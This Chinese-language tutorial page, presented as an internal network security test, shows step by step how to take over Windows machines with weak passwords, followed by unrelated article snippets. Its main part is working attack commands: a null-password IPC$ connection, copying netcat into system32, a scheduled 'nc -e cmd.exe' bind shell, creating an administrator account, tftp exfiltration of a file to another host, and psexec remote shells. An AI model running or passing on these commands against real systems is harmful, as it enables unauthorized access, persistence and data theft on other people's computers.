局域网内部安全测试--------利用弱密码控制远程计算机

news/2024/7/24 8:46:03 标签: 测试, user, 作业, shell, 任务, 工具

先扫描内部网段(网上扫描软件很多,我习惯用X-Scan),获得弱密码

可以看到现在已经扫描出来许多弱密码,可以进一步控制

首先和对方建立连接
net use //10.1.12.84/ipc$ "" /user:"Administrator" 命令成功完成。
这是和ip为10.1.12.84的计算机建立IPC连接

copy nc.exe //10.1.12.84/admin$/system32,    nc.exe是一个获得控制台木马的服务器端。
复制一个文件到对方计算机的system32目录下面
这里复制的是一个telnet类连接工具
nc是netcat的简写,通常称为黑客界的"瑞士军刀",功能比较强大。

net time //10.1.12.84
查看对方计算机时间,以便利用计划任务   上午 08:40

at //10.1.12.84 08:42 nc -l -p 5000 -e cmd.exe
新加了一项作业,其作业 ID = 1
添加一个任务,在08:42运行;运行之后将开放一个端口:5000
可以通过这个端口获得一个shell ,即控制台

运行之后就可以连接了
nc 10.1.12.84 5000
和对方计算机连接。本地的nc.exe 和对方的nc.exe 建立连接,获得一个shell.

出现C:/WINDOWS/system32>
现在就成功进入了对方计算机,管理员权限。

 

现在测试一下能否在对方计算机上执行命令

查看用户
net user
3个用户

添加一个用户试试。
net user testuser testpass /add
命令成功完成

查看用户
net user
4个用户

将添加的用户加入管理员组。
net localgroup administrators testuser /add
命令成功完成

看看刚添加的用户情况
net user testuser
管理员Administrators组

删除用户
net user testuser /del

ipconfig 看它的IP :  10.1.12.84

窃取资料
dir c:/
假设现在要c:/SOUND.LOG
先在本地架设tftp服务器
tftp -i 10.1.16.148 put c:/sound.log
成功传回

 

退出。

测试一下磁盘映射,现在我的电脑的硬盘分区为C D E F
net use x: //10.1.16.148/c$
查看我的电脑,多了一个x盘。
现在操作对方文件如同操作自己计算机上的文件一样。
x盘实际上就是对方的c盘
删除映射
net use x: /del


利用管道工具psexec可以直接在建立IPC连接之后快速地取得控制权
psexec.exe //10.1.12.84 cmd
出现了shell,又进去了!
C:/WINDOWS/system32>

退出!

删除连接
net use //10.1.12.84/ipc$ /del

演示结束,谢谢 !

 

http://www.niftyadmin.cn/n/1693862.html

相关文章

优化的最近点问题排序法和预处理法

问题描述: 设平面上有N个点,求最近的两个点之间的距离(欧氏距离)。 算法分析 典型的用分治思想来解决的问题。把所有点划分成左右两部分,然后求出左右两部分的最短距离minD。求中间交叉部分的最短距离,从而…

JAVA电子书系列

环境安装配置 TOMCAT的配置JAVA配置文件编写说明文档一步一步学会配置Kjava开发环境Weblogic7开发EJB的配置图解JSP环境安装配置Tomcat配置方法全程指导Linux下JAVA环境配置   学习方法 通过JB4学习JAVA10步学习 JavaScriptJava Sctipt学习不求人JSP学习指南JAVA学习文档J2…

Confluence 6 配置校验和识别

校验你的设置 查看你 Confluence 当前使用的设置,请参考 Viewing System Properties 页面中的内容。 识别系统属性 请参考 Recognized System Properties 页面中的内容来找到针对你安装 Confluence 版本可以配置的系统属性参数。 https://www.cwiki.us/display/CONF…

java概念简析

[对象的创建与使用]java中对象是由类创建出来的创建对象包括:1.定义对象 2.建立对象 3.初始化对象 如:Rectangle myRectanglenew Rectangle(0,0,10,20);使用:1.通过对象变量的引用来使用对象如:myRectangle.width20;2.通过调用对象的方法来使…

IPC——管道

概述 管道通信分为无名管道、有名管道 管道通信的本质 不管是有名管道,还是无名管道,它们的本质其实都是一样的,它们都是内核所开辟的一段缓存空间。进程间通过管道通信时,本质上就是通过共享操作这段缓存来实现,只不过…

windows的140个技巧

windows的140个技巧! 在古月风刀兄的blog上,看到了这篇文章,爱不释手 1. 重装Windows XP不需再激活   如果你需要重装Windows XP,通常必须重新激活。事实上只要在第一次激活时,备份好Windows/System32目录中的Wpa.d…

优惠券和促销的设计规则

转:https://www.pmcaff.com/article/index/522932721808512 ps:最新做的事情有点杂,发一个优惠券和促销活动的设计,希望对新人有些帮助! 1. 设计思路 优惠券生成流程 1.1. 概述 1. 表现形式和内在 优惠券 或者 促销活动 只是承载促…

nginx问题集

2019独角兽企业重金招聘Python工程师标准>>> nginx启动关闭操作 nginx -s reload:修改配置后重新加载生效 nginx -s reopen:重新打开日志文件 nginx -t -c /path/to/nginx.conf 测试nginx配置文件是否正确 关闭nginx: nginx -…